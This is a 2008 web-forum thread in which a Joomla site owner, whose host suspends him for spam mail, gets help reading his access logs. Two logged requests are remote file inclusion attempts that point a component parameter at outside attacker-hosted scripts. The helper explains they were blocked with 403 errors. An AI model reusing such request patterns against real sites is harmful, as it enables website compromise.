Hacked?

[aussiemike]

I changed the register globals on the February 10, 2008 straight after I asked the question in the forum. My hosts then told me within 24 hours that the emails were being sent again and suspended my account again.

Here is a line from the log file which I will send you a copy to your email:
74.50.11.15 - - [09/Feb/2008:23:49:38 +1100] "GET /component/option,com_facileforms/Itemid,38//use/components/com_facileforms/facileforms.frame.php?&mosConfig_absolute_path=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 403 - "-" "libwww-perl/5.808"

The file facileforms.frame.php does not exist on the site.

This is the line created when the exploit entered my site. it stopped as soon as I had uninstalled sh404SEF

[shumisha]

HI,

So, reading this line from your log, I would say you may have removed one of your possible protection by removing sh404SEF. ANyway, this line is not involved in your problem. As you can see by reading the log, someone requested the file :
/component/option,com_facileforms/Itemid,38//use/components/com_facileforms/facileforms.frame.php

trying to additionnally insert the ?$mosConfig_absolute_path=http://bogorhacker.co.cc/irc/irc.txt??

which would have cause a remote file to be included, should you have been using an older version of Facile Form, which was subject to this vulnerability.
However, you server responded to this request with a 403 code (...HTTP/1.1" 403 - "-" "libwww-perl/5.808"...), which is the code for "Forbidden access". WHich means the request was denied and nothing happened there.
My best guess is that you are using Joomla standard .htaccess, which includes protection against this kind of attack, though I don't remember if it was already there in Joomla 1.0.11
Alternatively, if you are using a recent version of sh404SEF, it may also have been sh404SEF blocking this attack

The reason for what you are seeing is not in Facile Forms, at least if this line in the log is why you thought FF was involved.

You have not stated clearly which version of sh404SEF you were using, aside from 'the most recent'. What version was it ?

Regards

[aussiemike]

I was using version 1.3RC and yes I was using the standard Joomla .htacess (is this not the correct thing to do?)

[shumisha]

Hi,

Yes, it is correct to do :

oomla standard .htaccess, which includes protection against this kind of attack, though I don't remember if it was already there in Joomla 1.0.11

Protection against this kind of attacks was added in Joomla standard .htaccess, but I don't remember in which version.

Anyway, the point I was trying to make is this line shows that an attack targeting "...components/com_facileforms/facileforms.frame.php" was launched against your site. However, this attacked failed because it was blocked either by Joomla .htaccess or by sh404SEF (resulting in a 403 error being displayed to the attacker. Additionnally, even if you did not have the protection of either Joomla .htaccess or sh404SEF, this attack would have failed anyway because it was targeting an older version of facile forms. The target file (facileforms.frame.php) is no longer part of facile form in FF 1.4.7.

The general conclusion is that you have not yet identified the origin of the problem you are (were) suffering from!

Regards

[aussiemike]

Hi
I have just had the site suspended again due to the same problem without having sh404SEF installed. I will have raw logs for this problem as soon as providers allow me access to cpanel.

My aplologies to all concerned, it appears that the sh404SEF was secure after all.

If anyone is good with finding a security problem with my Joomla site I could use some help which would be appreciated ($)

[aussiemike]

I have just checked the raw log files again and found the follwoing line:

202.60.64.18 - - [20/Feb/2008:01:55:56 +1100] "GET /index2.php?option=com_sefservicemap&Itemid=&mosConfig_absolute_path=http://communityflow.com/xxxxx/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"

Does this mean anything to anyone? I went to the web address shown and my antivirus quanrantined a suspect file so please dont go there

[shumisha]

Hi,

Same thing : this was an attack against a possibly vulnerable component, but it was rejected (Acces Forbidden) as can be seen by the response code (403). If the request had been accepted (and therefore may have caused some damages), the response code would be 200 (means : OK)

Regards

[aussiemike]

Well I am totally lost on how it is happening. i think I will have to purchase a component to protect the site and hope that works.

[shumisha]

Hi,

I would advise you first clear up things. If mails are still being sent, it means a script was installed on your server. You have to find that hidden script. Having a sec. component would be useless as it can only protect entry, but won't prevent already installed scripts to operate.
If you have ssh access, and know a little bit of linux (you're on linux or windows ?) commands, you should be able to find it by looking unusual files.
I suggest you go now to forum.joomla.org, and look for the faq section and sticky posts dealing with "You have been hacked". There are also small programs you can install that will check for unusual files.

Hope this helps

Regards

[aussiemike]

Thanks Shumisha
I think I will pull the whole site down and start afresh with additional security. I am on UNIX and it is shared so i don't think I have SSH and I wouldn't know where to start. I giess this is a good time to learn.

Tank you again.

[aussiemike]

I would just like to let everyone know that it was NOT facile forms or sh404sef that was insecure on my site but Joomla itself. unfortunately I was one of the early sites to be attacked while using Joomla!1.0.13

I found a virus had been uploaded onto the site.

thank you to everyone who tried to help me and I apologise for any inferrance that there was an insecurity in either component.